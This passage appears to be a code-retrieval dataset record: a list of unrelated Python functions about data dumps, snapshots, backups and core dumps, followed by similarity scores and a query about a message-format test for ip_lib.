%s]\" % pid.pid_value\n\n click.echo(\" DS: %s %s\" % (dataset.dataset_id, recid))\n\n if dry_run:\n db.session.rollback()\n else:\n db.session.add(dmp)\n db.session.commit()", "def snapshot(self, filename=None):\n if filename:\n self.command(\"snapshot %(filename)s\" % locals())\n else:\n self.command(\"snapshot\")", "def run_dumpbin(self, *dumpbin_args):\n assert sys.platform in ('win32', 'cygwin')\n cmd = os.environ.get('COMSPEC', 'cmd.exe')\n arguments = [cmd, '/c', self.vsvars_path, '&&', 'dumpbin']\n arguments.extend(dumpbin_args)\n proc = 
subprocess.Popen(arguments, stdout=subprocess.PIPE)\n output = proc.communicate()[0]\n assert not proc.returncode\n return output", "def rundmp(seq_path,msa_path,skiphhblits=False,skipdmp=False):\n if HHBLITS_VIA_DMP:\n msa_path = os.path.join(os.path.splitext(seq_path)[0]+\".a3m\")\n \n if HHBLITS_VIA_DMP and not skiphhblits:\n dmp_exec = '\"'+DMP_PATH+'\"' + ' -i '+ seq_path\n else:\n dmp_exec = '\"'+DMP_PATH+'\"' + ' -i '+ seq_path + ' -a ' + msa_path\n \n if not skipdmp:\n try: \n stdoutput=subprocess.check_output(dmp_exec,stderr=subprocess.STDOUT,shell=True)\n except:\n interrupt(\"ERROR: An error occurred during the execution of DeepMetaPSICOV.\")\n printout(stdoutput)\n else:\n printout('Skipping DeepMetaPSICOV execution.')\n\n if HHBLITS_VIA_DMP: \n msaa3mfile = os.path.join(os.path.basename(os.path.splitext(seq_path)[0])+\".a3m\")\n msaa3mpath = os.path.join(output_dir(),msaa3mfile)\n shutil.copyfile(msa_path,msaa3mpath)\n \n parsedmsa, msajonespath = msafilesgen(msaa3mpath)\n return parsedmsa, msajonespath", "def OnSim42RunCmdFileDump(self, event):\n path = self.PromptPathOpenCmd()\n if not path: return\n pathOut = self.PromptPathSaveCmd()\n if not pathOut: return\n f = open(pathOut, 'w')\n oldOut = self.sim42interp.cmd.output\n oldOutSys = sys.stdout\n self.sim42interp.cmd.output = f\n sys.stdout = f\n self.IgnoreMessages()\n self.RunCmdFile(path)\n self.UnIgnoreMessages()\n f.close()\n self.sim42interp.cmd.output = oldOut\n sys.stdout = oldOutSys", "def dump_pre(self,status):\n pass", "def test_build_stump(self):\n D = np.mat(np.ones((5, 1)) / 5)\n best, min_err, best_estimate =\\\n ada_boost.build_stump(self.larger_matrix,\n self.larger_class_labels,\n D)\n expected = {'threshold': 1.3, 'dim': 0, 'inequal': 'lt'}\n self.assertEqual(best, expected)", "def dump_data(self,filename,dump_id):\n # get pure data copy\n data = [ d.get_pure_data_copy() for d in self.plotter.data ]\n # full file name of the file with manipulator dump\n filename=tdc_Filenames.get_full_vis_filename(dump_id, filename+'.pickle')\n pickle.dump( data, open(filename,'w') )\n print '\\nContent dumped in \"%s\" \\n' % filename", "def dump(self):\n self.hasher.update_time_dicts() # Makes the time measurements available\n\n print(\" Creating a results folder in {} and storing all results there.\".format(self.config.output_dir))\n if not os.path.isdir(self.config.output_dir):\n os.mkdir(self.config.output_dir)\n\n print(\" Dumping profile ...\")\n profile_file_name = \"{}_{}_profile\".format(self.name, self.config.mode)\n with open(os.path.join(self.config.output_dir, profile_file_name), \"a\") as file:\n profile = {\"config\": self.config.dump(),\n \"hash\": self.hasher.hash_time_dict,\n \"find\": self.hasher.find_time_dict}\n\n json.dump(profile, file)\n\n print(\" Dumping matches ...\")\n for i, match in enumerate(self.__matched_offsets):\n if int(match[0] > match[1]):\n offset_a = match[1]\n offset_b = match[0]\n else:\n offset_a = match[0]\n offset_b = match[1]\n\n match_file_name = \"{}_{}_{}_{}\".format(self.name, self.config.mode, offset_a, offset_b)\n with open(os.path.join(self.config.output_dir, match_file_name), \"w\") as file:\n infos = \"Config:\\n: {}\".format(self.config)\n text_a = \"\"\n text_b = \"\"\n if self.config.dump_text:\n text_a = \"Text:\\n{}\".format(self.__offset_text_map.get(offset_a))\n text_b = \"Text:\\n{}\".format(self.__offset_text_map.get(offset_b))\n\n file.write(\"{}\\n\\n{}\\n\\n{}\\n\\n{}\".format(infos, text_a, \"#\"*25, text_b))\n\n if self.config.dump_graph:\n print(\" 
Creating graphs ...\")\n x1, x2 = list(), list()\n y1, y2 = list(), list()\n t_all = 0\n for element, t in self.hasher.hash_time_dict.items():\n t_all += t\n x1.append(element)\n y1.append(t_all)\n\n t_all = 0\n for element, t in self.hasher.find_time_dict.items():\n t_all += t\n x2.append(element)\n y2.append(t_all)\n\n self.__plot(os.path.join(self.config.output_dir, \"hash_time\"), x1, y1)\n self.__plot(os.path.join(self.config.output_dir, \"find_time\"), x2, y2)\n\n print(\"\\n\\n\")\n\n return", "def take_memory_snapshot(*args):\n return _ida_segment.take_memory_snapshot(*args)", "def dump_me(self, fileName=None) :\n if fileName is None :\n fileName = \"./data/oP4_ModelBuilder.dump\"\n else :\n pass\n with open(fileName,\"wb\") as dumpedFile:\n oPickler = pickle.Pickler(dumpedFile)\n oPickler.dump(self)", "def dump_objects():\n pass", "def _mst_calc(dest_tifs, params, tiles, preread_ifgs):\n process_tiles = mpiops.array_split(tiles)\n log.info('Calculating minimum spanning tree matrix')\n\n def _save_mst_tile(tile, i, preread_ifgs):\n \"\"\"\n Convenient inner loop for mst tile saving\n \"\"\"\n mst_tile = mst.mst_multiprocessing(tile, dest_tifs, preread_ifgs, params)\n # locally save the mst_mat\n mst_file_process_n = join(params[cf.TMPDIR], 'mst_mat_{}.npy'.format(i))\n np.save(file=mst_file_process_n, arr=mst_tile)\n\n for t in process_tiles:\n _save_mst_tile(t, t.index, preread_ifgs)\n log.debug('Finished mst calculation for process {}'.format(mpiops.rank))\n mpiops.comm.barrier()", "def collect_full_core_dump(core_dump_dir=\"\", filename=\"\"):\r\r\n\r\r\n loggerModem = logging.getLogger(__name__ + 'collect_full_core_dump')\r\r\n\r\r\n core_dump_path = (os.path.join(core_dump_dir, filename))\r\r\n\r\r\n icera_tools_bin_path = os.sep.join(os.environ['PL1_WCDMA_TEST_ROOT'].split(os.sep)[:]+['common', 'icera'])\r\r\n\r\r\n get_crash_dump_log(core_dump_dir=core_dump_dir, icera_utils_path=icera_tools_bin_path)", "def snapshot(self, agent_memory):\n\n read_cmd = \"SELECT \"\n for r in self.TABLE_COLUMNS:\n read_cmd += r + \", \"\n read_cmd = read_cmd.strip(\", \")\n read_cmd += \" FROM \" + self.TABLE + \" WHERE uuid=?\"\n data = agent_memory._db_read_one(read_cmd, self.memid)\n if not data:\n raise (\"tried to snapshot nonexistent memory\")\n\n archive_memid = self.new(agent_memory, snapshot=True)\n new_data = list(data)\n new_data[0] = archive_memid\n\n if hasattr(self, \"ARCHIVE_TABLE\"):\n archive_table = self.ARCHIVE_TABLE\n else:\n archive_table = self.TABLE\n write_cmd = \"INSERT INTO \" + archive_table + \"(\"\n qs = \"\"\n for r in self.TABLE_COLUMNS:\n write_cmd += r + \", \"\n qs += \"?, \"\n write_cmd = write_cmd.strip(\", \")\n write_cmd += \") VALUES (\" + qs.strip(\", \") + \")\"\n agent_memory._db_write(write_cmd, *new_data)\n link_archive_to_mem(agent_memory, self.memid, archive_memid)", "def mergeAndSaveFile(dumpMetaFile, chunkSizeFile, outFile):\n dump = open (dumpMetaFile, \"r\")\n chunk = open (chunkSizeFile, \"r\")\n out = open (outFile, \"w\")\n \n cline = \"\"\n cline = chunk.readline()\n cline = cline.rstrip(\"\\n\")\n\n while dump:\n dline = dump.readline()\n if not dline:\n break\n dline = dline.rstrip(\"\\n\")\n \n # Split line parts \n dlineParts = dline.split(' ')\n \n # Read lines from chunkSize\n numEntries = int(dlineParts[2])\n \n entries = []\n for i in range(numEntries):\n entries.append([dlineParts[i*3 + 3], dlineParts[i*3 + 4], dlineParts[i*3 + 5], 0])\n #entries[i][0] = dlineParts[i*3 + 3]\n #entries[i][1] = dlineParts[i*3 + 4]\n #entries[i][2] = 
dlineParts[i*3 + 5]\n #entries[i][3] = 0\n\n while True:\n clineParts = cline.split(' ')\n if ((dlineParts[0] == clineParts[0]) and (dlineParts[1] == clineParts[1])):\n for i in range(numEntries):\n if ((entries[i][0] == clineParts[3]) and (entries[i][1] == clineParts[4])):\n entries[i][3] = clineParts[2]\n else:\n break\n cline = chunk.readline()\n cline = cline.rstrip(\"\\n\")\n if not cline:\n break\n\n # Print output\n out.write(dlineParts[0]+\" \"+dlineParts[1]+\" \"+dlineParts[2]+\" \")\n for i in range(numEntries):\n out.write(str(entries[i][3])+\" \"+entries[i][0]+\" \"+entries[i][1]+\" \"+entries[i][2]+\" \")\n out.write(\"\\n\")\n out.close()", "def enable_dump_permission(sdk_path, device_id, dest_dir, package_name):\n\n print 'Starting dump permission grant'\n perm_command = [os.path.join(sdk_path, 'platform-tools', 'adb'),\n '-s', device_id,\n 'shell',\n 'pm', 'grant', package_name,\n 'android.permission.DUMP']\n print perm_command\n log_file_path = os.path.join(dest_dir, 'logs', 'enable_dump_perm.log')\n with open(log_file_path, 'w') as log_file:\n try:\n subprocess.call(perm_command,\n stdout=log_file,\n stderr=subprocess.STDOUT,\n shell=False)\n except OSError:\n print 'ERROR executing permission grant.'", "def core_dump(self):\r\r\n loggerModem = logging.getLogger(__name__ + 'core_dump')\r\r\n cmd_l=[r'at%debug=0', r'at%debug=2']\r\r\n cmd_str='\\r\\n'.join(cmd_l)\r\r\n\r\r\n text_str = \"AT command\"\r\r\n if self.dumpfile:\r\r\n loggerModem.debug(\"Core file : %s\" % self.dumpfile)\r\r\n loggerModem.debug(\"%-15s:\\t%s\" %(text_str, cmd_str))\r\r\n with open(self.dumpfile, 'wb') as fd:\r\r\n cmd_str = cmd_str + '\\r\\n'\r\r\n self.serObj.write(cmd_str) # write a string\r\r\n len_rd=0\r\r\n response = self.serObj.read(2**16)\r\r\n while len(response)>0:\r\r\n len_rd += len(response)\r\r\n loggerModem.debug(\"read %s bytes, current_len=%s\" % (len(response), len_rd))\r\r\n fd.write(response)\r\r\n response = self.serObj.read(2**16)\r\r\n loggerModem.info(\"Created core dump: %s\" % self.dumpfile)\r\r\n else:\r\r\n loggerModem.info(\"No core dump as no dump file specified!\")", "def dump(memory, startad, endad):\n res = \"\"\n gap = 0\n \n # but not always\n if cpu.thumb_mode: instr_size = 2\n else: instr_size = 4\n \n \n # Made the caller align the address\n #startad = (startad//instr_size)*instr_size\n #endad = (endad//instr_size)*instr_size\n \n i = startad\n \n addr = startad\n while addr <= endad:\n if i <= addr:\n res += new_section_check(addr)\n #if is_const_section(addr): # for debug\n # pass\n membytes = cpu.read_memory(addr, instr_size)\n if membytes is not None:\n memword = int.from_bytes(membytes, 'little')\n else:\n print(\"Reading uninitialized memory, address = {:#x}\".format(addr))\n memword = 0 # should this happen\n \n if is_code_section(addr):\n if cpu.thumb_mode: \n #if is_thumb32(memword):\n # instr_size = 4\n #else:\n instr_size = 2\n else:\n instr_size = 2 \n \n if memword == 0: \n gap += 1\n i+= instr_size\n else:\n if gap > 0:\n res += \"*** gap of {:d} halfword\".format(gap)\n if gap > 1:\n res += 's'\n res += '\\n'\n gap = 0 \n if addr in symdict:\n res += '\\n---------' + '<' + symdict[addr] + '>:\\n'\n mbytes = membytes[0:instr_size]\n instr = cpu.read_memory_int(addr, 4)\n \n tmp_res, actual_instr_size = disass.disass(addr, \n instr, \n cpu.thumb_mode)\n if cpu.thumb_mode:\n if actual_instr_size == 4:\n extrabytes = my_hex(cpu.read_memory(addr+2, 2))\n else:\n extrabytes = \" \"\n else:\n extrabytes = \"\"\n res += \"{:08x} \".format(addr) + 
my_hex(\n mbytes) + \" \" + extrabytes + \" \" + tmp_res + \"\\n\"\n i += actual_instr_size # Thumb 2 could be either \n else:\n \n if (addr % 4) == 0:\n instr_size = 4 # not code, not an instruction\n if memword != 0:\n if gap > 1:\n res += \"*** repeats for {:d} word\".format(gap-1)\n if (gap-1) > 1:\n res += 's'\n res += '\\n'\n gap = 0 \n mbytes = cpu.read_memory(addr, 4)\n res += \"{:08x} \".format(addr)+'.word '+my_hex(mbytes)+\"\\n\"\n else:\n if gap == 0:\n res += \"{:08x} \".format(addr)+'.word 0\\n'\n gap += 1\n i += 4\n else: \n instr_size = 2\n res += \"{:08x} \".format(addr)+'.word '+my_hex(membytes)+\"\\n\"\n i += 2 \n addr = cpu.get_next_addr(addr, instr_size)\n if addr is None:\n addr = endad+instr_size \n \n return res", "def test_backup_restore_with_dgm(self):\n self.load_to_dgm()\n self.backup_create()\n self.backup_cluster_validate()\n self.backup_restore_validate(compare_uuid=False, seqno_compare_function=\">=\")", "def dump(self) -> None:\n ...", "def dump(self, dest: Optional[str] = None) -> None:\n if dest is None:\n dest = self._default_dump_dest\n with open(dest, \"wb+\") as f:\n dill.dump(self, f)", "def dump(self, obj, bin=1):\n f = self.open(\"wb\")\n import pickle\n\n try:\n error.checked_call(pickle.dump, obj, f, bin)\n finally:\n f.close()", "def intf_MMDUMP(E):\n print(mmout.mmdump(MMEL))", "def test_backup_restore_with_warmup(self):\n gen = BlobGenerator(\"ent-backup\", \"ent-backup-\", self.value_size, end=self.num_items)\n self._load_all_buckets(self.master, gen, \"create\", 0)\n self.backup_create()\n NodeHelper.do_a_warm_up(self.backupset.cluster_host)\n self.sleep(30)\n self.backup_cluster_validate()\n self.backup_restore_validate(compare_uuid=False, seqno_compare_function=\">=\")\n \"\"\" only membase bucket has warmup state \"\"\"\n if self.bucket_type == \"membase\":\n NodeHelper.wait_warmup_completed([self.backupset.cluster_host])", "def is_dump():\n return sync_mode in (SyncMode.DUMP_LOCAL, SyncMode.DUMP_REMOTE)", "def mine(self, ship_id, target_id):\n\n # Perfom mining\n mine_string = \"SELECT MINE(\" + str(ship_id) + \",\" + str(target_id) + \");\"\n self.conn_cur.execute(mine_string)\n print(\"[>] Mining ordered\")", "def debug(options, folder, suffix, verbose=True, save_optim=False):\n device = torch.device(options[\"device\"])\n values = torch.randn(1024, device=device)\n\n final_snapshot = save_snapshot(\n os.path.join(folder, f\"blob{suffix}.gz\"),\n values=values.cpu()\n )\n\n # this might help with creeping gpu memory\n gc.collect()\n torch.cuda.set_device(device)\n torch.cuda.empty_cache()\n\n return final_snapshot", "def dumpWithPreobjects(self, preObjects, *obj, **kw):\n\n dis = kw.get(\"dis\")\n try:\n toBeDumped = (preObjects, obj[0] if len(obj) == 1 else obj)\n\n # ensure that the pickler does not touch sys.modules more than required\n with PEP302ImportDetector(raiseOn=kw.get(\"raiseOn\")) as detector:\n sys_modules = dict(sys.modules)\n p = self.pickler.dumps(toBeDumped,\n mangleModuleName=kw.get(\"mangleModuleName\"),\n object_dispatch=kw.get(\"object_dispatch\"))\n sys_modules2 = dict(sys.modules)\n imports = set()\n for n in detector.imports:\n sys_modules2.pop(n, None)\n for i in self.IMPORTS_TO_IGNORE:\n if n.startswith(i):\n break\n else:\n imports.add(n)\n self.assertEqual(sys_modules, sys_modules2)\n self.assertEqual(imports, set())\n\n self.pickler.dis(p, out=StringIO())\n except:\n exinfo = sys.exc_info()\n l = []\n try:\n _sPickle.Pickler(l, 2, object_dispatch=kw.get(\"object_dispatch\")).dump(toBeDumped)\n except 
Exception:\n try:\n l.append(pickle.STOP)\n pickletools.dis(b\"\".join(l), out=sys.stderr)\n except:\n traceback.print_exc(limit=1, file=sys.stderr)\n raise exinfo[0], exinfo[1], exinfo[2]\n\n if dis is None:\n dis = self.dis\n if dis:\n self.pickler.dis(p)\n print(\"len(pickle): \", len(p))\n return p", "def loadBinsRmsdsFromDumpFile(self):\n bins_rmsds_dump_file = open(self.BINS_RMSDS_DUMP_FNAME , 'r')\n bins_rmsds = pickle.load(bins_rmsds_dump_file)\n bins_rmsds_dump_file.close()\n return bins_rmsds", "def process_archive(self, file):\n self.recursive_archive_depth += 1\n # LOG: write_log or somehow log the archive file here\n if self.recursive_archive_depth >= self.max_recursive_depth:\n file.make_dangerous('Archive bomb')\n else:\n tempdir_path = file.make_tempdir()\n # TODO: double check we are properly escaping file.src_path\n # otherwise we are running unvalidated user input directly in the shell\n command_str = '{} -p1 x \"{}\" -o\"{}\" -bd -aoa'\n unpack_command = command_str.format(SEVENZ_PATH,\n file.src_path, tempdir_path)\n self._run_process(unpack_command)\n self.process_dir(tempdir_path, file.dst_path)\n self.safe_rmtree(tempdir_path)\n self.recursive_archive_depth -= 1", "def run(self):\n type = self.config.get('type', DEFAULT_BACKUP_TYPE)\n backup_dir = self.config.get('backup_dir', self.default_ongoing_backup_dir)\n archive = self.config.get('archive', False)\n only_postprocess = self.config.get('only_postprocess', False)\n compress = self.config.get('compress', False)\n rotate = self.config.get('rotate', False)\n threads = self.config.get('threads', DEFAULT_BACKUP_THREADS)\n\n # find or generate the backup file/dir\n if only_postprocess:\n if self.name.startswith('/'): # if passed an absolute path as section name\n # basedir doesn't work as intended if passed /a/path/like/this/\n backup_dir = os.path.normpath(os.path.join(self.name, '..'))\n self.parse_backup_file()\n else:\n self.find_backup_file(backup_dir)\n if self.file_name is None:\n msg = 'Problem while trying to find the backup files at %s'\n self.logger.error(msg, backup_dir)\n return 10\n else:\n self.generate_file_name(backup_dir)\n\n output_dir = os.path.join(backup_dir, self.dir_name)\n if type == 'dump':\n backup = MyDumperBackup(self.config, self)\n elif type == 'snapshot':\n backup = MariaBackup(self.config, self)\n elif type == 'null':\n backup = NullBackup(self.config, self)\n else:\n self.logger.error('Unrecognized backup format: %s', type)\n return 11\n\n # get the backup command\n if not only_postprocess:\n cmd = backup.get_backup_cmd(backup_dir)\n\n # start status monitoring\n if 'statistics' in self.config: # Enable statistics gathering?\n source = self.config.get('host', 'localhost') + \\\n ':' + \\\n str(self.config.get('port', DEFAULT_PORT))\n stats = DatabaseBackupStatistics(dir_name=self.dir_name, section=self.name,\n type=type, config=self.config.get('statistics'),\n backup_dir=output_dir, source=source)\n else:\n stats = DisabledBackupStatistics()\n\n stats.start()\n\n if not only_postprocess:\n # run backup command\n self.logger.debug(cmd)\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = process.communicate()\n if backup.errors_on_output(out, err):\n stats.fail()\n return 3\n\n # Check log for errors\n if backup.errors_on_log():\n self.logger.error('Error log found at %s', self.log_file)\n stats.fail()\n return 4\n\n # Check medatada file exists and containg the finish date\n if backup.errors_on_metadata(backup_dir):\n 
self.logger.error('Incorrect metadata file')\n stats.fail()\n return 5\n\n # Backups seems ok, prepare it for recovery and cleanup\n try:\n cmd = backup.get_prepare_cmd(backup_dir)\n except BackupException as ex:\n self.logger.error(str(ex))\n stats.fail()\n return 13\n if cmd != '':\n self.logger.debug(cmd)\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = process.communicate()\n if backup.errors_on_prepare(out, err):\n self.logger.error('The mariabackup prepare process did not complete successfully')\n stats.fail()\n return 6\n\n # get file statistics\n stats.gather_metrics()\n\n if archive:\n backup.archive_databases(output_dir, threads)\n\n if compress:\n # no consolidation per-db, just compress the whole thing\n result = self.tar_and_remove(backup_dir, self.file_name, [self.dir_name, ],\n compression='/usr/bin/pigz -p {}'.format(threads))\n if result != 0:\n self.logger.error('The compression process failed')\n stats.fail()\n return 11\n\n if rotate:\n # perform rotations\n # move the old latest one to the archive, and the current as the latest\n # then delete old backups of the same section, according to the retention\n # config\n result = self.move_backups(self.name, self.default_final_backup_dir,\n self.default_archive_backup_dir, self.name_regex)\n if result != 0:\n self.logger.warning('Archiving backups failed')\n result = self.os_rename(os.path.join(backup_dir, self.file_name),\n os.path.join(self.default_final_backup_dir, self.file_name))\n if result != 0:\n self.logger.error('Moving backup to final dir failed')\n stats.fail()\n return 12\n result = self.purge_backups()\n if result != 0:\n self.logger.warning('Purging old backups failed')\n\n # we are done\n stats.finish()\n return 0", "def memory_snapshot(tag, rank):\n GB = 1024 * 1024 * 1024\n MB = 1024 * 1024\n KB = 1024\n\n peak = dgl.partition.get_peak_mem() * KB\n mem = psutil.virtual_memory()\n avail = mem.available / MB\n used = mem.used / MB\n total = mem.total / MB\n\n mem_string = f\"{total:.0f} (MB) total, {peak:.0f} (MB) peak, {used:.0f} (MB) used, {avail:.0f} (MB) avail\"\n logging.debug(f\"[Rank: {rank} MEMORY_SNAPSHOT] {mem_string} - {tag}\")", "def dump_debug(cid, output_path):\n \n def opath ( dir_name, file_name = None ):\n \"\"\" Takes file_name and returns full path to file in output directory \"\"\"\n if file_name:\n return os.path.join(output_path, dir_name, file_name)\n return os.path.join(output_path, dir_name)\n\n SQL.execute('''\n SELECT \n cables.cid as cid,\n cp.guid as guid,\n cp.port as port,\n cp.hca as hca, \n cables.mtime as mtime,\n cp.flabel as flabel\n FROM \n cables\n INNER JOIN\n cable_ports as cp\n ON\n cables.cid = cp.cid\n WHERE\n cables.cid == ? 
\n ''',(\n cid,\n ))\n\n ## Node info: Lid 1627\n lidregex = re.compile( r\"\"\"^# Node info: Lid (?P<lid>\\d+)\"\"\") \n\n guids = set()\n sources = set()\n\n nfile.mkdir_p(output_path)\n\n for row in SQL.fetchall(): \n label = hex(int(row['guid']))\n #use smpquery to figure out the lid of the ca\n #r1lead:~ # smpquery nodeinfo -G 0xe41d2d03004bef70 30\n ## Node info: Lid 1627\n #BaseVers:........................1\n #ClassVers:.......................1\n #NodeType:........................Switch\n #NumPorts:........................30\n #SystemGuid:......................0xe41d2d03004bef70\n #Guid:............................0xe41d2d03004bef70\n #PortGuid:........................0xe41d2d03004bef70\n #PartCap:.........................8\n #DevId:...........................0xcb20\n #Revision:........................0x000000a0\n #LocalPort:.......................17\n #VendorId:........................0x0002c9\n\n ret = ib_mgt.exec_opensm_to_string(\"smpquery nodeinfo -G %s %s\" % (int(row['guid']), int(row['port'])), True)\n if not ret:\n vlog(1, 'Unable to query state of %s' % (row['flabel']))\n elif row['guid'] in guids:\n vlog(4, 'Skipping repeat pull of %s' % (row['flabel']))\n else:\n guids.add(row['guid'])\n for node, output in list(ret['output'].items()):\n for out in output:\n match = lidregex.match(out)\n if not match:\n vlog(1, 'Unable to find lid of %s' % (row['flabel']))\n else:\n lid = match.group('lid')\n\n nfile.mkdir_p(opath(label))\n\n if row['hca']:\n vlog(3, 'Skipping HCA %s' % (row['flabel'])) \n else: #switch\n #3 \"mlxdump -d lid-$LID snapshot -m full\" snapshots in a row\n #mellanox asked for 3 dumps every time\n for i in range(1, 4):\n time.sleep(5)\n ib_mgt.exec_opensm_to_file(\n 'cd /var/tmp/; rm -f mlxdump.udmp; date; mlxdump -d lid-%s snapshot -m full 2>&1; mv -v mlxdump.udmp mlxdump.%s.udmp' % (lid, i), \n opath(label, 'mlxdump.%s.log' % (i))\n )\n ib_mgt.pull_opensm_files(opath(label), ' /var/tmp/mlxdump.%s.udmp' % (i) )\n \n #flint -d lid-$LID q \n ib_mgt.exec_opensm_to_file(\n 'flint -d lid-%s q 2>/dev/null' % (lid), \n opath(label, 'flint-query.log')\n )\n\n nfile.write_file(\n opath(label, 'switch-info.txt'),\n 'Switch Name: %s' % row['flabel']\n )\n\n SQL.execute('''\n SELECT \n source\n FROM \n issues \n WHERE\n ignore = 0 and \n cid = ? 
and\n mtime >= ?\n ORDER BY mtime ASC\n ''', (\n int(row['cid']),\n int(row['mtime']) if row['mtime'] else None,\n ))\n\n for irow in SQL.fetchall():\n src = str(irow['source'])\n if src in sources:\n vlog(4, 'skipping repeat source: %s' % (src))\n else:\n sources.add(src)\n if not os.path.isdir(src):\n vlog(4, 'skipping non-directory source: %s' % (src))\n else:\n p = None\n sp = os.path.split(src)\n if os.path.isdir(sp[1]):\n p = sp[1]\n elif os.path.isdir(sp[0]):\n sp = os.path.split(sp[0])\n p = sp[1]\n\n if not p:\n vlog(4, 'skipping unknown directory source: %s' % (p))\n else:\n cpp = os.path.join(output_path, p)\n if os.path.isdir(cpp):\n vlog(3, 'skipping repeat copying %s -> %s' % (src, cpp))\n else:\n vlog(3, 'Copying %s -> %s' % (src, cpp))\n shutil.copytree(src, cpp, False)", "def _backup_chunk(self, backup, container, data, data_offset,\n object_meta, extra_metadata):\n object_prefix = object_meta['prefix']\n object_list = object_meta['list']\n\n object_id = object_meta['id']\n object_name = '%s-%05d' % (object_prefix, object_id)\n obj = {}\n obj[object_name] = {}\n obj[object_name]['offset'] = data_offset\n obj[object_name]['length'] = len(data)\n LOG.debug('reading chunk of data from volume')\n if self.compressor is not None:\n algorithm = CONF.backup_compression_algorithm.lower()\n obj[object_name]['compression'] = algorithm\n data_size_bytes = len(data)\n data = self.compressor.compress(data)\n comp_size_bytes = len(data)\n LOG.debug('compressed %(data_size_bytes)d bytes of data '\n 'to %(comp_size_bytes)d bytes using '\n '%(algorithm)s',\n {\n 'data_size_bytes': data_size_bytes,\n 'comp_size_bytes': comp_size_bytes,\n 'algorithm': algorithm,\n })\n else:\n LOG.debug('not compressing data')\n obj[object_name]['compression'] = 'none'\n\n LOG.debug('About to put_object')\n write_length_bytes = len(data)\n with self.get_object_writer(\n container, object_name, extra_metadata=extra_metadata\n ) as writer:\n writer.write(data)\n md5 = hashlib.md5(data).hexdigest()\n obj[object_name]['md5'] = md5\n LOG.debug('backup MD5 for %(object_name)s: %(md5)s',\n {'object_name': object_name, 'md5': md5})\n object_list.append(obj)\n object_id += 1\n object_meta['list'] = object_list\n object_meta['id'] = object_id\n\n LOG.debug('Calling eventlet.sleep(0)')\n eventlet.sleep(0)\n return write_length_bytes", "def save_dump_runinfo(self, content):\n if RunInfo.NAME in self._enabled:\n try:\n self._write_dump_runinfo(content)\n except Exception:\n if self.verbose:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n sys.stderr.write(repr(traceback.format_exception(\n exc_type, exc_value, exc_traceback)))\n sys.stderr.write(\"Couldn't save dump run info file. 
Continuing anyways\\n\")", "def compress_file(map_, name, save_path):\n size = os.path.getsize(save_path)\n temp = subprocess.run([\"gzip\", \"-k\", save_path])\n cr_size = os.path.getsize(save_path+\".gz\")\n try:\n map_[name] = cr_size / size\n except Exception as e:\n print(f\"File: {save_path}, Ori:{size}, Compr:{cr_size}\")\n print(e)\n raise ZeroDivisionError\n temp = subprocess.run([\"rm\", save_path])\n temp = subprocess.run([\"rm\", save_path+\".gz\"])", "def table_dump_query(table_name, path, rows_per_dump):\n return\"\"\"\n DEFINE TEMP-TABLE tt NO-UNDO LIKE %(table_name)s\n FIELD rec_id AS RECID\n FIELD epoch_time AS INT64.\n\n DEFINE VARIABLE epoch AS DATETIME NO-UNDO.\n DEFINE VARIABLE unixTime AS INT64 NO-UNDO.\n DEFINE VARIABLE htt AS HANDLE NO-UNDO.\n DEFINE VARIABLE cFileName AS CHARACTER NO-UNDO FORMAT \"x(60)\".\n DEFINE VARIABLE rowCount as INT64 NO-UNDO.\n\n epoch = DATETIME(1,1,1970,0,0,0,0).\n rowCount = 0.\n\n htt = TEMP-TABLE tt:HANDLE.\n\n FOR EACH platte.%(table_name)s NO-LOCK:\n IF rowCount = %(rows_per_dump)s THEN DO: \n unixTime = interval(NOW, epoch, \"milliseconds\").\n cFileName = \"%(path)s/t__%(table_name)s__e__\" + STRING(unixTime) + \"__insert.json\".\n htt:WRITE-JSON(\"FILE\", cFileName + \"_partial\", TRUE).\n OS-RENAME VALUE(cFileName + \"_partial\") VALUE(cFileName).\n rowCount = 0.\n EMPTY TEMP-TABLE tt.\n END.\n rowCount = rowCount + 1.\n CREATE tt.\n BUFFER-COPY %(table_name)s TO tt.\n tt.rec_id = RECID(%(table_name)s).\n unixTime = interval(NOW, epoch, \"milliseconds\").\n tt.epoch_time = unixTime.\n END.\n unixTime = interval(NOW, epoch, \"milliseconds\").\n cFileName = \"%(path)s/t__%(table_name)s__e__\" + STRING(unixTime) + \"__insert.json\".\n htt:WRITE-JSON(\"FILE\", cFileName + \"_partial\", TRUE).\n OS-RENAME VALUE(cFileName + \"_partial\") VALUE(cFileName)\n \n\"\"\" % {'path': path, 'table_name': table_name, 'rows_per_dump': rows_per_dump}", "def dump(self):\n return self.dump_internal(0)", "def _memtop_exec(options, user_args):\n if options.outfile is None:\n out = sys.stdout\n else:\n out = open(options.outfile, 'w')\n\n tracemalloc.start()\n\n _load_and_exec(options.file[0], user_args)\n\n snapshot = tracemalloc.take_snapshot()\n display_top(snapshot, limit=options.limit, file=out)" ]
[ "0.57792044", "0.53705996", "0.52849925", "0.52743363", "0.5234966", "0.518306", "0.51442665", "0.5070806", "0.5030404", "0.49894577", "0.49146363", "0.49089596", "0.48556525", "0.4828357", "0.48120502", "0.47813582", "0.47782636", "0.4737786", "0.46923456", "0.46380943", "0.45736268", "0.45575222", "0.45132217", "0.44417477", "0.44284102", "0.44216308", "0.43894592", "0.43817386", "0.43554786", "0.4351797", "0.43509188", "0.43259507", "0.43185276", "0.43182284", "0.4292699", "0.42853492", "0.4277114", "0.42729318", "0.4269674", "0.42662752", "0.42653263", "0.42591435", "0.4259126", "0.42518935", "0.42490065", "0.42364892", "0.42182", "0.4214153", "0.42076373", "0.4199573", "0.41981727", "0.41972795", "0.41947934", "0.4190577", "0.41778344", "0.41763642", "0.4168309", "0.414741", "0.41455507", "0.41277447", "0.41259193", "0.41242337", "0.41188654", "0.4118542", "0.41100022", "0.4102148", "0.41011882", "0.40933144", "0.4092863", "0.40916318", "0.40869227", "0.4084554", "0.4083968", "0.40823478", "0.40687293", "0.40660238", "0.4057902", "0.4057625", "0.4056693", "0.40503973", "0.40456283", "0.40246454", "0.40237874", "0.40178362", "0.40178344", "0.40169936", "0.40160328", "0.40160197", "0.40155613", "0.40109476", "0.4010749", "0.40032333", "0.40005428", "0.39905077", "0.39895844", "0.39805958", "0.39766383", "0.39738563", "0.39707148", "0.39674202" ]
0.6442122
0
Make sure message is formatted correctly.
def test_setting_failure(self):
    with mock.patch.object(ip_lib, 'set_ip_nonlocal_bind', return_value=1):
